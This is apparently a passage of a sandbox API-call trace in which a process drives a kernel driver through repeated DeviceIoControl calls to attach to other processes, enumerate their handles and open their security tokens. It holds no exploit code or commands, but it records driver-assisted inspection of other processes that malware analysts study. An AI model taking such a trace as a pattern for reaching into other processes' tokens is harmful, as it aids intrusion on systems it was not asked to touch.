[0245.794] ObfDereferenceObject (Object=0xfffffa8001fc9c50) returned 0x1 [0245.794] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.794] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.794] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0245.794] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.795] PsAcquireProcessExitSynchronization () returned 0x0 [0245.795] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0) [0245.795] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fca500, HandleInformation=0x0) returned 0x0 [0245.795] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.795] PsReleaseProcessExitSynchronization () returned 0x2 [0245.795] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0245.795] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.795] ObfDereferenceObject (Object=0xfffffa8001fca500) returned 0x1 [0245.795] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.795] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.795] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.795] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.795] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.795] PsAcquireProcessExitSynchronization () returned 0x0 [0245.795] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0) [0245.795] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.795] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.795] PsReleaseProcessExitSynchronization () returned 0x2 [0245.795] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0245.795] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.796] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.796] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.796] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x70c) returned 0xc8 [0245.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.796] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001feeb30, HandleInformation=0x0) returned 0x0 [0245.796] ObOpenObjectByPointer (in: Object=0xfffffa8001feeb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.796] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x14 [0245.796] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.796] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.796] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.796] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.796] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.798] CloseHandle (hObject=0xc4) returned 1 [0245.798] CloseHandle (hObject=0xc8) returned 1 [0245.798] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.798] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.799] PsAcquireProcessExitSynchronization () returned 0x0 [0245.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0) [0245.799] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a90530, HandleInformation=0x0) returned 0x0 [0245.799] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.799] PsReleaseProcessExitSynchronization () returned 0x2 [0245.799] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0245.799] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.799] ObfDereferenceObject (Object=0xfffffa8003a90530) returned 0x1 [0245.799] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.799] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.799] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0245.799] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.799] PsAcquireProcessExitSynchronization () returned 0x0 [0245.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0) [0245.799] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fdbf20, HandleInformation=0x0) returned 0x0 [0245.799] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.799] PsReleaseProcessExitSynchronization () returned 0x2 [0245.799] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0245.800] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.800] ObfDereferenceObject (Object=0xfffffa8001fdbf20) returned 0x1 [0245.800] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.800] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.800] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.800] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.800] PsAcquireProcessExitSynchronization () returned 0x0 [0245.800] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880053c85d0) [0245.800] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.800] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.800] PsReleaseProcessExitSynchronization () returned 0x2 [0245.800] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0245.800] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.800] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.800] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.800] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x434) returned 0xc8 [0245.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.801] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002005b30, HandleInformation=0x0) returned 0x0 [0245.801] ObOpenObjectByPointer (in: Object=0xfffffa8002005b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.801] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x14 [0245.801] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.801] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.801] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.801] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.801] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.803] CloseHandle (hObject=0xc4) returned 1 [0245.803] CloseHandle (hObject=0xc8) returned 1 [0245.803] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.803] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.803] PsAcquireProcessExitSynchronization () returned 0x0 [0245.804] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0) [0245.804] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8df20, HandleInformation=0x0) returned 0x0 [0245.804] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.804] PsReleaseProcessExitSynchronization () returned 0x2 [0245.804] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0245.804] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.804] ObfDereferenceObject (Object=0xfffffa8001e8df20) returned 0x1 [0245.804] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.804] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.804] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0245.804] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.804] PsAcquireProcessExitSynchronization () returned 0x0 [0245.804] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0) [0245.804] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ef3cd0, HandleInformation=0x0) returned 0x0 [0245.804] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.804] PsReleaseProcessExitSynchronization () returned 0x2 [0245.804] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0245.804] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.804] ObfDereferenceObject (Object=0xfffffa8001ef3cd0) returned 0x1 [0245.804] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.805] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.805] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.805] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.805] PsAcquireProcessExitSynchronization () returned 0x0 [0245.805] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880053c85d0) [0245.805] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.805] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.805] PsReleaseProcessExitSynchronization () returned 0x2 [0245.805] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0245.805] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.805] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.805] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.805] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a8) returned 0xc8 [0245.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.805] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002017b30, HandleInformation=0x0) returned 0x0 [0245.805] ObOpenObjectByPointer (in: Object=0xfffffa8002017b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.805] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x14 [0245.806] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.806] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.806] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.806] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.806] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.808] CloseHandle (hObject=0xc4) returned 1 [0245.808] CloseHandle (hObject=0xc8) returned 1 [0245.808] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.808] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.808] PsAcquireProcessExitSynchronization () returned 0x0 [0245.808] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0) [0245.808] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002019f20, HandleInformation=0x0) returned 0x0 [0245.808] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.808] PsReleaseProcessExitSynchronization () returned 0x2 [0245.808] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0245.808] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.808] ObfDereferenceObject (Object=0xfffffa8002019f20) returned 0x1 [0245.808] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.809] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.809] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.809] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.809] PsAcquireProcessExitSynchronization () returned 0x0 [0245.809] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0) [0245.809] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002019a60, HandleInformation=0x0) returned 0x0 [0245.809] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.809] PsReleaseProcessExitSynchronization () returned 0x2 [0245.809] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0245.809] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.809] ObfDereferenceObject (Object=0xfffffa8002019a60) returned 0x1 [0245.809] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.809] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.809] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.809] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.809] PsAcquireProcessExitSynchronization () returned 0x0 [0245.809] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880053c85d0) [0245.809] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.809] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.810] PsReleaseProcessExitSynchronization () returned 0x2 [0245.810] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0245.810] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.810] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.810] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.810] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x564) returned 0xc8 [0245.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: 